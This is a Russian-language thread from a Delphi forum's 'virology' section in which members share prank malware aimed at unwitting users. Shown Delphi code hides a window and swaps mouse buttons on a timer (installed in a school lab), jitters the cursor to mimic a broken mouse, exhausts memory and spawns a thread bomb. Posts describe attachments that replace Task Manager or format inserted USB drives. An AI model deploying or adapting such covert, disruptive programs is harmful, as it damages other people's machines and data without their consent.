Среда, 17.01.2018, 17:52 Приветствую вас Гость | Группа "Гости" 


[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 1 из 11
Модератор форума: Волк-1024, Anton93, xXxSh@dowxXx 
delfcode » Delphi » Вирусология Delphi » Ваши любимые приколы (Иногда просто охото поприкалываться над юзерами...)
Ваши любимые приколы
NeoДата: Суббота, 23.07.2011, 09:20 | Сообщение # 1
Модератор
Зарегистрирован: 04.05.2010
Группа: Модераторы
Сообщений: 316
Статус: Offline
Наверняка каждый из нас писал что-то вроде программ приколов. Давайте здесь выложим угарные программки, с помощью которых можно будет поржать над юзерами wink Ну,я первый))).
Вот програмка - фейковый диспетчер, при запуске переименовывает taskmgr.exe на taskmgrexe.old и вместо оригинального вставляет
подставной. После этого прога грузит проц на 100,тем самым это вынуждает юзера вызвать диспетчер. smile biggrin

Вирус индукт в аттаче!
 
gravitasДата: Суббота, 23.07.2011, 12:57 | Сообщение # 2
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Орган полового размножения поверх экрана:
Code
procedure Kyi;
var
H: TCanvas;
begin
H:=TCanvas.Create;
H.Handle:=GetDC(0);
H.Rectangle(0, 0, 2000, 2000);
H.Brush.Color:=ClYellow;
H.Ellipse(0, 400, 100, 500);
H.Ellipse(100, 400, 200, 500);
H.Ellipse(50, 0, 150, 450);
H.Brush.Color:=ClNone;
H.Ellipse(80, 0, 120, 45);
H.Free;
end;

Использование:
Code
Kyi;
Sleep(2000); // слип можно убрать


А вот тоже, только прямо по центру экрана:
Code
function GetX : integer;
begin Result:=GetSystemMetrics(SM_CXSCREEN);
end;

function GetY : integer;
begin Result:=GetSystemMetrics(SM_CYSCREEN);
end;

procedure KyiCenter;
var
H: TCanvas;
X, Y: integer;
begin
X:=GetX;
Y:=GetY;
H:=TCanvas.Create;
H.Handle:=GetDC(0);
H.Rectangle(0, 0, 2000, 2000);
H.Brush.Color:=ClYellow;
H.Ellipse(Trunc((X/2)-150), Trunc((Y/2)+200), Trunc(X/2), Trunc((Y/2)+350));
H.Ellipse(Trunc(X/2), Trunc((Y/2)+200), Trunc(X/2)+150, Trunc((Y/2)+350));
H.Ellipse(Trunc(X/2)-75, Trunc((Y/2)-275), Trunc(X/2)+75, Trunc((Y/2)+300));
H.Brush.Color:=ClNone;
H.Ellipse(Trunc(X/2)-15, Trunc((Y/2)-275), Trunc(X/2)+15, Trunc((Y/2)-240));
H.Free;
end;

biggrin


TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
vvova15Дата: Суббота, 23.07.2011, 17:07 | Сообщение # 3
Участник
Зарегистрирован: 24.04.2010
Группа: Пользователи
Сообщений: 83
Статус: Offline
Code

program pechenka_vimogatel;
uses mmsytem;
procedure hochu_pechenku;
begin
mciSendString('Set cdaudio door open wait', nil, 0, 0);
if messageBox(0,'Печенькой угостиш?)','',MB_ICONQUESTION or MB_YESNO)=MRYES
then
begin
mciSendString('Set cdaudio door closed wait', nil, 0,0);
MEssageBox(0,'ням-ням спасибоi!','',MB_ICONINFORMATION or MB_OK);
end else
begin
mciSendString('Set cdaudio door closed wait', nil, 0, 0);
MEssageBox(0,'жмот((','',MB_ICONERROR or MB_OK);
end;
end;
begin
hochu_pechenku();
end.



ICQ 185-398


Сообщение отредактировал vvova15 - Суббота, 23.07.2011, 17:11
 
NeoДата: Пятница, 05.08.2011, 17:19 | Сообщение # 4
Модератор
Зарегистрирован: 04.05.2010
Группа: Модераторы
Сообщений: 316
Статус: Offline
Вот ещё прикол один набросал.Вирь выжыдает момент,когда юзер воткнёт флешку,после чего выводит месагу,а потом её форматирует! biggrin biggrin biggrin Кстати,процедурку форматирования надо бы усовершенствовать.
Прикрепления: 9777735.rar(166Kb)
 
vvova15Дата: Пятница, 05.08.2011, 18:54 | Сообщение # 5
Участник
Зарегистрирован: 24.04.2010
Группа: Пользователи
Сообщений: 83
Статус: Offline
формат конечно по быдлокодерски реализован -
используй IOCTL запросы к диску.
Типа IOCTL_DISK_VERIFY - проверка сектора.
IOCTL_DISK_FORMAT_TRACKS - форматирования дорожки

вот пример реализации на на си:


или можешь открыть исходники windows (win2k\private\shell\shell32\unicode\format.c)
и посмотреть как там реазиовано



ICQ 185-398
 
link993Дата: Пятница, 05.08.2011, 20:41 | Сообщение # 6
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
vvova15 - тема сайта "Вирусология - Взгляд из Доступно только для пользователей" ПРичем здесь си. Извини конечно.
 
gravitasДата: Пятница, 05.08.2011, 22:29 | Сообщение # 7
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
link993, они просто на пару с котэ тут всех на сишку пытаются переманить)

TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
XSPYДата: Четверг, 11.08.2011, 23:23 | Сообщение # 8
Продвинутый
Зарегистрирован: 28.01.2010
Группа: Пользователи
Сообщений: 258
Статус: Offline
gravitas, да ладно,код ценный))
А по теме-код на любых иных языках,кроме Дельфи-ставьте в тег оффтоп))


Я не крекер,а программист!
Я не преступник-я свободный человек!
Лучше один раз накодить,чем сто раз качать билды!
 
dolphinДата: Вторник, 16.08.2011, 23:06 | Сообщение # 9
Администратор
Сообщений: 902
Статус: Offline
Мой самый любимый прикол smile

Доступно только для пользователей
сохранить как 1.bat


Система: Windows 10 x64, Windows XP
Среды программирования: Delphi 7, Delphi 10 Seattle

Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
 
vvova15Дата: Среда, 17.08.2011, 19:19 | Сообщение # 10
Участник
Зарегистрирован: 24.04.2010
Группа: Пользователи
Сообщений: 83
Статус: Offline
Quote (dolphin)
Мой самый любимый прикол

тоже как то допустил ошибку в написании сервиса в функции CreateProcess - в результате сервис рекурсивно запускал сам себя. пришлось загрузиться с livecd и удалить pe-шник с винта, т.к. память полностью забивалась за несколько минут



ICQ 185-398


Сообщение отредактировал vvova15 - Среда, 17.08.2011, 19:20
 
NeoДата: Среда, 24.08.2011, 14:46 | Сообщение # 11
Модератор
Зарегистрирован: 04.05.2010
Группа: Модераторы
Сообщений: 316
Статус: Offline
Доступно только для пользователей

Сообщение отредактировал Neo - Среда, 24.08.2011, 14:52
 
gravitasДата: Среда, 24.08.2011, 18:31 | Сообщение # 12
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Quote (Neo)
beginthread(nil,0,@Bomba,nil,0,q);
beginthread(nil,0,@Bomba,nil,0,w);
beginthread(nil,0,@Bomba,nil,0,e);
beginthread(nil,0,@Bomba,nil,0,r);
beginthread(nil,0,@Bomba,nil,0,t);
beginthread(nil,0,@Bomba,nil,0,y);
beginthread(nil,0,@Bomba,nil,0,u);
beginthread(nil,0,@Bomba,nil,0,i);
beginthread(nil,0,@Bomba,nil,0,o);
beginthread(nil,0,@Bomba,nil,0,p);
beginthread(nil,0,@Bomba,nil,0,aa);
beginthread(nil,0,@Bomba,nil,0,s);
beginthread(nil,0,@Bomba,nil,0,d);
beginthread(nil,0,@Bomba,nil,0,ff);
beginthread(nil,0,@Bomba,nil,0,g);
beginthread(nil,0,@Bomba,nil,0,h);
beginthread(nil,0,@Bomba,nil,0,j);
beginthread(nil,0,@Bomba,nil,0,k);
beginthread(nil,0,@Bomba,nil,0,ll);
beginthread(nil,0,@Bomba,nil,0,z);
beginthread(nil,0,@Bomba,nil,0,x);
beginthread(nil,0,@Bomba,nil,0,c);
beginthread(nil,0,@Bomba,nil,0,v);
beginthread(nil,0,@Bomba,nil,0,b);
beginthread(nil,0,@Bomba,nil,0,c);
beginthread(nil,0,@Bomba,nil,0,v);
beginthread(nil,0,@Bomba,nil,0,b);
beginthread(nil,0,@Bomba,nil,0,n);
beginthread(nil,0,@Bomba,nil,0,m);

Эт круто)
Code
var
ID: array of cardinal;
begin
...
for i:=0 to xxx do
beginthread(nil,0,@Bomba,nil,0,ID[i]);


TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
NeoДата: Четверг, 25.08.2011, 05:08 | Сообщение # 13
Модератор
Зарегистрирован: 04.05.2010
Группа: Модераторы
Сообщений: 316
Статус: Offline
ок,только как же 77,78 строка? cool

Сообщение отредактировал Neo - Четверг, 25.08.2011, 05:08
 
gravitasДата: Четверг, 25.08.2011, 12:16 | Сообщение # 14
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Neo, незаметил)

TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
vvova15Дата: Пятница, 26.08.2011, 11:51 | Сообщение # 15
Участник
Зарегистрирован: 24.04.2010
Группа: Пользователи
Сообщений: 83
Статус: Offline
быдлокод detected
более правильно сделать так:
Доступно только для пользователей



ICQ 185-398


Сообщение отредактировал dolphin - Воскресенье, 25.12.2011, 19:26
 
kalinochkindДата: Пятница, 16.12.2011, 20:12 | Сообщение # 16
Новичок
Зарегистрирован: 12.12.2011
Группа: Пользователи
Сообщений: 3
Статус: Offline
Code

var p:^extended;
begin
while true do
new(p)

У меня 2 гига за минуту кончились.
 
NeoДата: Суббота, 24.12.2011, 05:46 | Сообщение # 17
Модератор
Зарегистрирован: 04.05.2010
Группа: Модераторы
Сообщений: 316
Статус: Offline
Нашёл в инете прикольный исходник.Прога записывает все события мышки в файл,а потом всё
это воспроизводит smile
Прикрепления: 3960836.rar(278Kb)
 
cool1Дата: Воскресенье, 25.12.2011, 13:31 | Сообщение # 18
Участник
Зарегистрирован: 14.07.2010
Группа: Пользователи
Сообщений: 238
Статус: Offline
Слушайте, я где-то видел прикол - кароче, прога подделывает рабочий стол и создает на нем некий файл*-*. Ты его запускаешь и тебе открывается табла с двумя кнопками и надписью - "Удалить все файлы с компьютера" - Кнопки "Да" и "Нет" ("Нет" естественно не робит)). Жмем "Да" - программа создает форму с процессом удаления файлов (ну т.е. окошко с выполнением операции удаления файлов)! А файлы в строке удаления (ну названия файлов) те-же что и у тебя на компьютере) После рестарта все становиться "O.k.).
Есть примеры?



За помощь ставьте +!
 
DelДата: Вторник, 21.08.2012, 14:43 | Сообщение # 19
Участник
Зарегистрирован: 20.08.2012
Группа: Пользователи
Сообщений: 69
Статус: Offline
Давненько похожую прогу установил в компьютерном классе. Она после запуска меняла кнопки мыши местами и через 10 секунд возвращала обратно, а ещё через 10секнуд всё начиналось заново. devil
P.S. Реализация не самая лучшая, но результат был великолепен.
Code


procedure TForm1.Timer1Timer(Sender: TObject);
begin
SwapMouseButton(true);
Timer2.Enabled:=true;
Timer3.Enabled:=false;
end;

procedure TForm1.Timer2Timer(Sender: TObject);
begin
timer1.Enabled:=False;
timer3.Enabled:=true;
SwapMouseButton(False);
end;

procedure TForm1.Timer3Timer(Sender: TObject);
begin
Timer1.Enabled:=true;
Timer2.Enabled:=false;
end;

procedure TForm1.FormActivate(Sender: TObject);
begin
ShowWindow(Handle, SW_Hide);
ShowWindow(Application.Handle,SW_Hide);

end;

end.
 
C@TДата: Вторник, 21.08.2012, 14:53 | Сообщение # 20
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 265
Статус: Offline
Del,

использовать 3 таймера это быдлокод smile

лучше объяви глобальную переменную

var
Swaped : bool = false;

и в коде таймера напиши

procedure TForm1.Timer1Timer(Sender: TObject);
begin
Swaped := not Swaped; // (из тру в фолз и наоборот)
SwapMouseButton(Swaped);
end;
 
DelДата: Вторник, 21.08.2012, 14:59 | Сообщение # 21
Участник
Зарегистрирован: 20.08.2012
Группа: Пользователи
Сообщений: 69
Статус: Offline
Quote (C@T)
использовать 3 таймера это быдлокод smile

Ну, я и говорю, что реализация не очень.
 
OctaviusДата: Среда, 31.10.2012, 10:46 | Сообщение # 22
Новичок
Зарегистрирован: 30.10.2012
Группа: Пользователи
Сообщений: 1
Статус: Offline
cool

Сообщение отредактировал Octavius - Среда, 31.10.2012, 13:23
 
AligatorBkmzДата: Четверг, 24.03.2016, 07:08 | Сообщение # 23
Был не раз
Зарегистрирован: 24.03.2016
Группа: Пользователи
Сообщений: 9
Статус: Offline
Вот вам программка от меня, которая не позволяет нацелится курсором мыши, дабы юзер был в гневе и лупил мишкой по столу. Я старался симулировать поведение неисправной мыши - чтоб никто не догадался)))

Так сказать - код в студию:
Код

var
  Form1: TForm1;
  lastPoint:TPoint;
implementation

{$R *.lfm}

{ TForm1 }

procedure TForm1.FormCreate(Sender: TObject);
begin
randomize;
end;

procedure TForm1.Timer1Timer(Sender: TObject);
var
  directionBottom,directionRight:boolean;
  x,y,step:integer;
begin
  x:=Mouse.CursorPos.X;
  y:=Mouse.CursorPos.Y;

  if (lastPoint.X<>x)or(lastPoint.Y<>y) then
     begin
       Timer1.Interval:=random(100)+100;
       step:=(random(8)+1)*2;
       randomize;
       if random(2)=1 then directionBottom:=not directionBottom;
       if random(2)=1 then directionRight:=not directionRight;

       if directionBottom then
          y:=y+step
       else
          y:=y-step;

       if directionRight then
          x:=x+step
       else
          x:=x-step;

          Mouse.CursorPos := Point(x,y);
      end;
  lastPoint:=Point(x,y);
end;



Сообщение отредактировал AligatorBkmz - Четверг, 24.03.2016, 07:09
 
AligatorBkmzДата: Четверг, 24.03.2016, 07:24 | Сообщение # 24
Был не раз
Зарегистрирован: 24.03.2016
Группа: Пользователи
Сообщений: 9
Статус: Offline
dolphin,
- Мой самый любимый прикол
- Таки Да! только я еще вызов калькулятора прописывал и в папку автозагрузки кидал.
До сих пор вспоминаю недовольное лицо сисадмина :D

P.S учеба - золотое время))


Сообщение отредактировал AligatorBkmz - Четверг, 24.03.2016, 07:26
 
delfcode » Delphi » Вирусология Delphi » Ваши любимые приколы (Иногда просто охото поприкалываться над юзерами...)
Страница 1 из 11
Поиск:

delfcode.ru © 2008 - 2018 Хостинг от uCoz